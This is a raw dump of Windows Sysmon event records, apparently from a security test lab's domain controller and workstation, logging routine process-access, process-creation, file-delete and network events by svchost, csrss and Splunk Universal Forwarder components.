12:31:28.778{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326916C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048792Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:28.778{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326916C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048791Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:28.778{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326916C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048790Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:28.778{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326916C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048789Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:28.778{FE4C2B44-D9F3-63C7-0500-00000000AF02}4082524C:\Windows\system32\csrss.exe{FE4C2B44-E6A0-63C7-A406-00000000AF02}7784C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000048788Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:28.778{FE4C2B44-DA67-63C7-AA00-00000000AF02}20924876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{FE4C2B44-E6A0-63C7-A406-00000000AF02}7784C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000048787Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:28.777{FE4C2B44-E6A0-63C7-A406-00000000AF02}7784C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{FE4C2B44-D9F3-63C7-E703-000000000000}0x3e70SystemMD5=679D3E04F6AB7B10FF27D06B29C27A12,SHA256=FF1B5220C99EA6173BE693E1C2D700873ADE2F8A73F503FC0D297EA0792756D1,IMPHASH=05D58741E22C6453F52C1A9326FAF02D{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000048786Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:28.546{FE4C2B44-E652-63C7-8C06-00000000AF02}7044ATTACKRANGE\AdministratorC:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exeC:\Users\Administrator\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State~RF318e76.TMPMD5=2800881C775077E1C4B6E06BF4676DE4,SHA256=226EEC4486509917AA336AFEBD6FF65777B75B65F1FB06891D2A857A9421A974,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000048785Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:28.509{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=32A2332C0727A5FBD90876F644EE372B,SHA256=00A5751FD97A5643F71697BDD75507EBB1E8CC4D1AF5D9FB0A01F1546549A304,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000019077Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:31:29.864{E5A8D418-DCC0-63C7-A300-00000000B002}9683180C:\Windows\system32\conhost.exe{E5A8D418-E6A1-63C7-4402-00000000B002}2348C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019076Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:31:29.864{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019075Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:31:29.864{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019074Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:31:29.864{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019073Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:31:29.864{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019072Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:31:29.864{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019071Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:31:29.864{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019070Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:31:29.864{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019069Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:31:29.864{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019068Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:31:29.864{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019067Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:31:29.864{E5A8D418-DC43-63C7-0500-00000000B002}4163684C:\Windows\system32\csrss.exe{E5A8D418-E6A1-63C7-4402-00000000B002}2348C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000019066Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:31:29.864{E5A8D418-DCC0-63C7-9F00-00000000B002}30963280C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{E5A8D418-E6A1-63C7-4402-00000000B002}2348C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000019065Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:31:29.865{E5A8D418-E6A1-63C7-4402-00000000B002}2348C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.2.5Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{E5A8D418-DC43-63C7-E703-000000000000}0x3e70SystemMD5=611F936426EC989CDC9FB43B692D3CFA,SHA256=AF94FF9B82C4BF6F27A5695E741D2BDF06A6A574924179D0BC9E7B8A725882F5,IMPHASH=A2763C4BA6D4717F662584401724A6B2{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000019064Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:31:29.671{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8E1CC50416F26E0948FF9B0B1DDC018A,SHA256=3C47BF91C3A617DDBF64D821B2411F2B6F08178AD04C8052E8F3FF34F4383CE3,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000048806Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:27.310{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56525-false10.0.1.12-8089- 10341000x800000000000000048805Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:29.849{FE4C2B44-E6A1-63C7-A506-00000000AF02}78167820C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6ae795|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6ae2c6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+643d8|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+65dfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+9dcf50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x800000000000000048804Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:29.813{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D788DA7E6A31EC2006BD29CD56B36562,SHA256=F8EAE6267DEFCCDF6C91A231C6B0900C6B88E40EFAB931F294057084022B310A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000048803Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:29.695{FE4C2B44-DA67-63C7-AE00-00000000AF02}49123668C:\Windows\system32\conhost.exe{FE4C2B44-E6A1-63C7-A506-00000000AF02}7816C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048802Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:29.695{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326916C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048801Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:29.695{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326916C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048800Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 